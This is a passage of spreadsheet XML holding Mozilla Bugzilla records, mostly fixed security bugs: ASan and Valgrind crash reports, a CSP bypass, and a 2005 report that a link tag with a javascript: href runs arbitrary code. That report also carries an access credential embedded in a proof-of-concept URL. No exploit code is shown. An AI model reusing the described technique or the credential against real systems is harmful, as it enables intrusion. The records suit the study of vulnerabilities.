      <c r="J3046" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3046" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3046" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3046" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3046" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3046" t="inlineStr">
        <is>
          <t>[adv-main22+] fixed by bug 841666</t>
        </is>
      </c>
      <c r="Q3046" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3046" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3046" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3046" t="n">
        <v>1</v>
      </c>
      <c r="U3046" t="n">
        <v>0</v>
      </c>
      <c r="V3046" t="n">
        <v>7</v>
      </c>
      <c r="W3046" t="inlineStr">
        <is>
          <t>Created attachment 693731
stack
function f() {
    var x = 500
    x = x * x
    x = x * x
    return x
}
f()
shows Valgrind error messages pointing to uninitialised value being created by a heap allocation at js::detail::BumpChunk::new with a js opt shell on m-c changeset 9de611848111 with --ion-eager.
See the attached stack.
s-s because this is an uninitialised value being detected by Valgrind, but feel free to open up if this is not s-s.
Will try to autoBisect this..</t>
        </is>
      </c>
      <c r="X3046" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3047">
      <c r="A3047" t="n">
        <v>1286940</v>
      </c>
      <c r="B3047" t="inlineStr">
        <is>
          <t>2016-07-14 12:52:14 -0700</t>
        </is>
      </c>
      <c r="C3047" t="inlineStr">
        <is>
          <t>Deploy telemetry-schema-services with docker on ec2 and test end-to-end</t>
        </is>
      </c>
      <c r="D3047" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E3047" t="n">
        <v>1</v>
      </c>
      <c r="F3047" t="n">
        <v>1</v>
      </c>
      <c r="G3047" t="n">
        <v>6</v>
      </c>
      <c r="H3047" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3047" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J3047" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K3047" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3047" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3047" t="inlineStr"/>
      <c r="Q3047" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3047" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3047" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3047" t="n">
        <v>1</v>
      </c>
      <c r="U3047" t="n">
        <v>0</v>
      </c>
      <c r="V3047" t="n">
        <v>2</v>
      </c>
      <c r="W3047" t="inlineStr">
        <is>
          <t>Once docker hub image for telmetry-schema-services is ready, deploy it on the ec2 instance: ec2-54-191-98-9.us-west-2.compute.amazonaws.com and test end-to-end</t>
        </is>
      </c>
      <c r="X3047" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3048">
      <c r="A3048" t="n">
        <v>1122091</v>
      </c>
      <c r="B3048" t="inlineStr">
        <is>
          <t>2015-01-15 09:25:33 -0800</t>
        </is>
      </c>
      <c r="C3048" t="inlineStr">
        <is>
          <t>package envconsul</t>
        </is>
      </c>
      <c r="D3048" t="inlineStr">
        <is>
          <t>2015-02-19 09:43:14 -0800</t>
        </is>
      </c>
      <c r="E3048" t="n">
        <v>1</v>
      </c>
      <c r="F3048" t="n">
        <v>1</v>
      </c>
      <c r="G3048" t="n">
        <v>4</v>
      </c>
      <c r="H3048" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3048" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3048" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3048" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3048" t="inlineStr">
        <is>
          <t>XScale</t>
        </is>
      </c>
      <c r="M3048" t="inlineStr">
        <is>
          <t>MeeGo</t>
        </is>
      </c>
      <c r="N3048" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3048" t="inlineStr"/>
      <c r="Q3048" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3048" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3048" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3048" t="n">
        <v>1</v>
      </c>
      <c r="U3048" t="n">
        <v>0</v>
      </c>
      <c r="V3048" t="n">
        <v>3</v>
      </c>
      <c r="W3048" t="inlineStr">
        <is>
          <t>envconsol is a Go app that is currently distributed only as platform-specific tarballs on a Github repo release page[0].  We should probably package it for our own use.
"Say what you will about the tenets of package management, Dude, at least it's an ethos."
[0] https://github.com/hashicorp/envconsul/releases</t>
        </is>
      </c>
      <c r="X3048" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3049">
      <c r="A3049" t="n">
        <v>566167</v>
      </c>
      <c r="B3049" t="inlineStr">
        <is>
          <t>2010-05-15 18:56:54 -0700</t>
        </is>
      </c>
      <c r="C3049" t="inlineStr">
        <is>
          <t>Can't build c-c when configured with a relative path (Fix regression from Bug 560007)</t>
        </is>
      </c>
      <c r="D3049" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E3049" t="n">
        <v>1</v>
      </c>
      <c r="F3049" t="n">
        <v>1</v>
      </c>
      <c r="G3049" t="n">
        <v>7</v>
      </c>
      <c r="H3049" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3049" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3049" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3049" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3049" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3049" t="inlineStr">
        <is>
          <t>[pymake]</t>
        </is>
      </c>
      <c r="Q3049" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3049" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3049" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3049" t="n">
        <v>1</v>
      </c>
      <c r="U3049" t="n">
        <v>0</v>
      </c>
      <c r="V3049" t="n">
        <v>10</v>
      </c>
      <c r="W3049" t="inlineStr">
        <is>
          <t>The perl-msys-wrapper script was fixed for m-c in Bug 518401, and that is the setup I ported to c-c. However when I dropped the 1_9_2 ifdefs I erroneously did not ensure that I kept the relative paths working, as I attempted to make us use the m-c file.
This bug is about restoring that.</t>
        </is>
      </c>
      <c r="X3049" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3050">
      <c r="A3050" t="n">
        <v>290036</v>
      </c>
      <c r="B3050" t="inlineStr">
        <is>
          <t>2005-04-12 04:46:41 -0700</t>
        </is>
      </c>
      <c r="C3050" t="inlineStr">
        <is>
          <t>Link tag allows to execute arbitrary code without user interaction</t>
        </is>
      </c>
      <c r="D3050" t="inlineStr">
        <is>
          <t>2007-04-01 14:40:07 -0700</t>
        </is>
      </c>
      <c r="E3050" t="n">
        <v>1</v>
      </c>
      <c r="F3050" t="n">
        <v>1</v>
      </c>
      <c r="G3050" t="n">
        <v>3</v>
      </c>
      <c r="H3050" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3050" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3050" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3050" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L3050" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3050" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3050" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3050" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3050" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3050" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3050" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3050" t="n">
        <v>1</v>
      </c>
      <c r="U3050" t="n">
        <v>0</v>
      </c>
      <c r="V3050" t="n">
        <v>19</v>
      </c>
      <c r="W3050" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
The link tag allows to load a custom image as the icon for a website, displayed
in the location bar and in the tab title. By setting the href attribute of this
tag to a javascript url, it is possible to call chrome functions and run
arbitrary code without user interaction.
Reproducible: Always
Steps to Reproduce:
1. Open http://bugzilla:kN2P9wk@www.mikx.de/firelinking/
2. Follow instructions
The example is cross platform: On Windows this example creates the file
c:\booom.bat and launches it (opens a dos box with a dir command). On Linux
(tested Fedora Core) and MacOSX the example creates the file ~/booom.txt or
/booom.txt. 
The non-windows examples are only roughly tested. Please don't complain if not
working. The way i need to double encode the backslash on linux looks a little
fishy and i doubt every Mac user can write to root by default. You get full user
rights with UniversalXPConnect, so everything else is just a matter of
implementation time.</t>
        </is>
      </c>
      <c r="X3050" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3051">
      <c r="A3051" t="n">
        <v>1811331</v>
      </c>
      <c r="B3051" t="inlineStr">
        <is>
          <t>2023-01-19 11:04:53 -0800</t>
        </is>
      </c>
      <c r="C3051" t="inlineStr">
        <is>
          <t>cfi-derived-cast: Invalid downcast in GetTableSelectionMode</t>
        </is>
      </c>
      <c r="D3051" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:05 -0700</t>
        </is>
      </c>
      <c r="E3051" t="n">
        <v>1</v>
      </c>
      <c r="F3051" t="n">
        <v>1</v>
      </c>
      <c r="G3051" t="n">
        <v>3</v>
      </c>
      <c r="H3051" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3051" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3051" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K3051" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3051" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3051" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3051" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3051" t="inlineStr">
        <is>
          <t>[adv-main110+]</t>
        </is>
      </c>
      <c r="Q3051" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3051" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S3051" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T3051" t="n">
        <v>1</v>
      </c>
      <c r="U3051" t="n">
        <v>0</v>
      </c>
      <c r="V3051" t="n">
        <v>10</v>
      </c>
      <c r="W3051" t="inlineStr">
        <is>
          <t>Steps to reproduce:
When compiling Firefox with cfi-derived-cast, crashtest editor/libeditor/crashtests/1618906.html fails due to the downcasting here: https://searchfox.org/mozilla-central/rev/daf613efc5c358f3a94961d73b90472c00703838/dom/base/Selection.cpp#512
The dynamic type of the casted object is `nsHTMLDocument`, which is not derived from `nsIContent`.
This might not be s-s, just flagging as a precaution.</t>
        </is>
      </c>
      <c r="X3051" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3052">
      <c r="A3052" t="n">
        <v>1064346</v>
      </c>
      <c r="B3052" t="inlineStr">
        <is>
          <t>2014-09-08 08:42:48 -0700</t>
        </is>
      </c>
      <c r="C3052" t="inlineStr">
        <is>
          <t>Crash [@ IsInsideNursery] with use-after-free (likely OOM)</t>
        </is>
      </c>
      <c r="D3052" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:25 -0700</t>
        </is>
      </c>
      <c r="E3052" t="n">
        <v>1</v>
      </c>
      <c r="F3052" t="n">
        <v>1</v>
      </c>
      <c r="G3052" t="n">
        <v>3</v>
      </c>
      <c r="H3052" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3052" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3052" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3052" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3052" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3052" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3052" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3052" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+]</t>
        </is>
      </c>
      <c r="Q3052" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3052" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3052" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3052" t="n">
        <v>1</v>
      </c>
      <c r="U3052" t="n">
        <v>0</v>
      </c>
      <c r="V3052" t="n">
        <v>17</v>
      </c>
      <c r="W3052" t="inlineStr">
        <is>
          <t>Created attachment 8485774
Testcase for shell
The attached testcase crashes on mozilla-central revision 2255d7d187b2 (run with --no-threads --fuzzing-safe).</t>
        </is>
      </c>
      <c r="X3052" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3053">
      <c r="A3053" t="n">
        <v>1099437</v>
      </c>
      <c r="B3053" t="inlineStr">
        <is>
          <t>2014-11-14 15:48:19 -0800</t>
        </is>
      </c>
      <c r="C3053" t="inlineStr">
        <is>
          <t>Negative-size-param memset in mozilla::layers::BufferTextureClient::AllocateForSurface</t>
        </is>
      </c>
      <c r="D3053" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:25 -0700</t>
        </is>
      </c>
      <c r="E3053" t="n">
        <v>1</v>
      </c>
      <c r="F3053" t="n">
        <v>1</v>
      </c>
      <c r="G3053" t="n">
        <v>3</v>
      </c>
      <c r="H3053" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3053" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3053" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K3053" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3053" t="inlineStr">
        <is>
          <t>[adv-main37+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q3053" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3053" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3053" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T3053" t="n">
        <v>1</v>
      </c>
      <c r="U3053" t="n">
        <v>0</v>
      </c>
      <c r="V3053" t="n">
        <v>34</v>
      </c>
      <c r="W3053" t="inlineStr">
        <is>
          <t>Created attachment 8523262
test.html
DOMFuzzHelper created
=================================================================
==29802==ERROR: AddressSanitizer: negative-size-param: (size=-827354608)
    #0 0x48c76e in __asan_memset _asan_rtl_
    #1 0x7fbe864815f9 in mozilla::layers::BufferTextureClient::AllocateForSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:677:12
    #2 0x7fbe86470ea8 in mozilla::layers::TextureClient::CreateForDrawing(mozilla::layers::ISurfaceAllocator*, mozilla::gfx::SurfaceFormat, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::BackendType, mozilla::layers::TextureFlags, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:350:8
    #3 0x7fbe86473045 in mozilla::layers::ContentClientRemoteBuffer::CreateBackBuffer(nsIntRect const&amp;) gfx/layers/client/CompositableClient.cpp:210:10
    #4 0x7fbe864735ef in mozilla::layers::ContentClientRemoteBuffer::CreateBuffer(gfxContentType, nsIntRect const&amp;, unsigned int, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*) gfx/layers/client/ContentClient.cpp:295:3
    #5 0x7fbe863d32b8 in mozilla::layers::RotatedContentBuffer::BeginPaint(mozilla::layers::PaintedLayer*, unsigned int) gfx/layers/RotatedBuffer.cpp:648:5
    #6 0x7fbe86484291 in mozilla::layers::ContentClientRemoteBuffer::BeginPaintBuffer(mozilla::layers::PaintedLayer*, unsigned int) objdir-ff-asan/dist/include/mozilla/layers/ContentClient.h:214:12
    #7 0x7fbe8646823c in mozilla::layers::ClientPaintedLayer::PaintThebes() gfx/layers/client/ClientPaintedLayer.cpp:54:5
    #8 0x7fbe86468e68 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) gfx/layers/client/ClientPaintedLayer.cpp:131:3
    #9 0x7fbe8648e3d7 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #10 0x7fbe8648e3d7 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #11 0x7fbe8648e3d7 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #12 0x7fbe8648e3d7 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #13 0x7fbe8648e3d7 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #14 0x7fbe864639b4 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:268:3
    #15 0x7fbe86463efb in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:298:3
    #16 0x7fbe89cac4a7 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1435:3
    #17 0x7fbe89d2d9db in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:3128:5
    #18 0x7fbe89dad133 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6337:5
    #19 0x7fbe89532422 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:443:7
    #20 0x7fbe89531c6e in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:384:9
    #21 0x7fbe89b53642 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1354:5
    #22 0x7fbe89b59716 in mozilla::RefreshDriverTimer::Tick() layout/base/nsRefreshDriver.cpp:173:5
    #23 0x7fbe84b154e5 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:621:7
    #24 0x7fbe84b160c0 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:714:3
    #25 0x7fbe84b0c106 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:830:7
    #26 0x7fbe84b62536 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #27 0x7fbe853a0daf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:99:21
    #28 0x7fbe85353761 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #29 0x7fbe89563a8f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:164:3
    #30 0x7fbe8afcc762 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:713:12
    #31 0x7fbe85353761 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #32 0x7fbe8afcbc72 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:550:7
    #33 0x4ba94f in main ipc/contentproc/plugin-container.cpp:158:19
    #34 0x7fbe820d6de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: negative-size-param ??:0 ??</t>
        </is>
      </c>
      <c r="X3053" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3054">
      <c r="A3054" t="n">
        <v>910139</v>
      </c>
      <c r="B3054" t="inlineStr">
        <is>
          <t>2013-08-28 01:42:23 -0700</t>
        </is>
      </c>
      <c r="C3054" t="inlineStr">
        <is>
          <t>CSP should block XSLT as script, not as style</t>
        </is>
      </c>
      <c r="D3054" t="inlineStr">
        <is>
          <t>2014-04-25 11:25:30 -0700</t>
        </is>
      </c>
      <c r="E3054" t="n">
        <v>1</v>
      </c>
      <c r="F3054" t="n">
        <v>1</v>
      </c>
      <c r="G3054" t="n">
        <v>3</v>
      </c>
      <c r="H3054" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3054" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3054" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3054" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3054" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3054" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3054" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3054" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q3054" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3054" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3054" t="n">
        <v>1</v>
      </c>
      <c r="U3054" t="n">
        <v>0</v>
      </c>
      <c r="V3054" t="n">
        <v>46</v>
      </c>
      <c r="W3054" t="inlineStr">
        <is>
          <t>It looks like this was already handled in bug 663567, but according to the webappsec-WG test suite for CSP (see URL), we fail this test and other browsers pass.
In order to achieve compliance with the spec, we should make sure this test passes.
(Bypassing CSP can be very harmful in b2g, so I'm making this bug hidden)</t>
        </is>
      </c>
      <c r="X3054" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3055">
      <c r="A3055" t="n">
        <v>879924</v>
      </c>
      <c r="B3055" t="inlineStr">
        <is>
          <t>2013-06-05 12:09:11 -0700</t>
        </is>
      </c>
      <c r="C3055" t="inlineStr">
        <is>
          <t>Non-null crash at nsCString::CharAt</t>
        </is>
      </c>
      <c r="D3055" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:08 -0800</t>
        </is>
      </c>
      <c r="E3055" t="n">
        <v>1</v>
      </c>
      <c r="F3055" t="n">
        <v>1</v>
      </c>
      <c r="G3055" t="n">
        <v>3</v>
      </c>
      <c r="H3055" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3055" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3055" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3055" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L3055" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3055" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3055" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3055" t="inlineStr">
        <is>
          <t>[asan][adv-main23+]</t>
        </is>
      </c>
      <c r="Q3055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3055" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3055" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3055" t="n">
        <v>1</v>
      </c>
      <c r="U3055" t="n">
        <v>0</v>
      </c>
      <c r="V3055" t="n">
        <v>22</v>
      </c>
      <c r="W3055" t="inlineStr">
        <is>
          <t>Opening the attached page with broken WAV data causes Firefox release-, beta- and aurora channels to crash at least on Linux (64-bit Debian wheezy) due to an invalid but heapish address. Filed promptly without much further research since this looks like a potential security issue in release version.
$ opt/firefox-aurora-asan/firefox ff-crash-nsCString.html 2&gt;&amp;1 | symbolize | c++filt
ASAN:SIGSEGV
=================================================================
==3779== ERROR: AddressSanitizer crashed on unknown address 0x7f69c31e8b87 (pc 0x7f68e00348e8 sp 0x7f68b04fb160 bp 0x7f68b04fb3f0 T20)
AddressSanitizer can not provide additional info.
    #0 0x7f68e00348e7 in nsCString::CharAt(unsigned int) const /home/aki/src/mozilla-aurora/../../../dist/include/nsTString.h:90
    #1 0x7f68e0032102 in mozilla::WaveReader::LoadAllChunks(nsAutoPtr&lt;nsDataHashtable&lt;nsCStringHashKey, nsCString&gt; &gt;&amp;) /home/aki/src/mozilla-aurora/content/media/wave/WaveReader.cpp:642
    #2 0x7f68e0031616 in mozilla::WaveReader::ReadMetadata(mozilla::VideoInfo*, nsDataHashtable&lt;nsCStringHashKey, nsCString&gt;**) /home/aki/src/mozilla-aurora/content/media/wave/WaveReader.cpp:145
    #3 0x7f68df7266af in mozilla::MediaDecoderStateMachine::DecodeMetadata() /home/aki/src/mozilla-aurora/content/media/MediaDecoderStateMachine.cpp:1816
    #4 0x7f68df72627f in mozilla::MediaDecoderStateMachine::DecodeThreadRun() /home/aki/src/mozilla-aurora/content/media/MediaDecoderStateMachine.cpp:498
Thread T20 created by T19 here:
    #0 0x439d84 in pthread_create ??:0
    #1 0x7f68e8120176 in _PR_CreateThread /home/aki/src/mozilla-aurora/nsprpub/pr/src/pthreads/ptthread.c:444
    #2 0x7f68e811fc77 in PR_CreateThread /home/aki/src/mozilla-aurora/nsprpub/pr/src/pthreads/ptthread.c:527
Thread T19 created by T0 here:
    #0 0x439d84 in pthread_create ??:0
    #1 0x7f68e8120176 in _PR_CreateThread /home/aki/src/mozilla-aurora/nsprpub/pr/src/pthreads/ptthread.c:444
    #2 0x7f68e811fc77 in PR_CreateThread /home/aki/src/mozilla-aurora/nsprpub/pr/src/pthreads/ptthread.c:527
Stats: 247M malloced (251M for red zones) by 343876 calls
Stats: 50M realloced by 16371 calls
Stats: 215M freed by 207394 calls
Stats: 78M really freed by 149442 calls
Stats: 440M (112721 full pages) mmaped in 110 calls
  mmaps   by size class: 8:229362; 9:32764; 10:12285; 11:16376; 12:2048; 13:1536; 14:1280; 15:384; 16:704; 17:1344; 18:48; 19:40; 20:24; 21:2;
